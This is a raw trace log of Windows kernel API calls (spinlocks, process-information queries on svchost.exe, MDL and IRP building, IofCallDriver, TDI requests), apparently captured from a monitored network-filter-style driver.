| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000ff0, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000ff0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47ffb |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a76fd0c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c251f40 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003ae849a0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002d562370, ret_val_unk_out = 0xffffe0003c8359e0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c251f40, MemoryDescriptorList_unk_out = 0xffffe0003c251f40 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003ae849a0, Irp_unk = 0xffffe0003c8359e0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003c8359e0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c251f40 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0a8, SpinLock_unk_out = 0xfffff800fc55c0a8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0a8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0a8 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003b6c9d90 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002d562570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002d562528, Handle_out = 0xffffffff80001060, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80001060, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80001060, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80001060, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47ffc |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a7b1d0c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1f1250 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003c697cd0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002d562370, ret_val_unk_out = 0xffffe0003b79bad0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1f1250, MemoryDescriptorList_unk_out = 0xffffe0003c1f1250 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003c697cd0, Irp_unk = 0xffffe0003b79bad0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003b79bad0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1f1250 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x467, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a779b90 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002d562570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002d562528, Handle_out = 0xffffffff80000ffc, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000ffc, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000ffc, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000ffc, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47ffb |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a779d0c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1f1250 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003ae849a0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002d562370, ret_val_unk_out = 0xffffe0003b79bad0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1f1250, MemoryDescriptorList_unk_out = 0xffffe0003c1f1250 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003ae849a0, Irp_unk = 0xffffe0003b79bad0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003b79bad0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1f1250 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b1fe4, SpinLock_unk_out = 0xffffe0003a7b1fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b1fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b1fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b1fe4, SpinLock_unk_out = 0xffffe0003a7b1fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b1fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b1fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b1fe4, SpinLock_unk_out = 0xffffe0003a7b1fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b1fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b1fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a779fe4, SpinLock_unk_out = 0xffffe0003a779fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a779fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a779fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a779fe4, SpinLock_unk_out = 0xffffe0003a779fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a779fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a779fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a779fe4, SpinLock_unk_out = 0xffffe0003a779fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a779fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a779fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0a8, SpinLock_unk_out = 0xfffff800fc55c0a8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0a8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0a8 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003a765a50, Irp_unk_out = 0xffffe0003a765a50, ret_val_out = 0x103 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
